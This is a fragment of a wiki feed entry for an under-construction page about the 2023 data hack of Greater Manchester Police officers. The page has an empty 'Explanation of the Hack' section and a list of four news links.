		<updated>2023-10-11T02:10:47Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Media Coverage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
&lt;br /&gt;
== Explanation of the Hack ==&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://www.bbc.com/news/uk-england-manchester-66810756&lt;br /&gt;
# https://www.bbc.co.uk/news/uk-england-manchester-66843618&lt;br /&gt;
# https://www.theguardian.com/uk-news/2023/sep/14/greater-manchester-police-officers-data-hacked-in-cyber-attack&lt;br /&gt;
# https://news.sky.com/story/amp/greater-manchester-police-officers-details-targeted-in-ransomware-attack-12960852&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
</feed>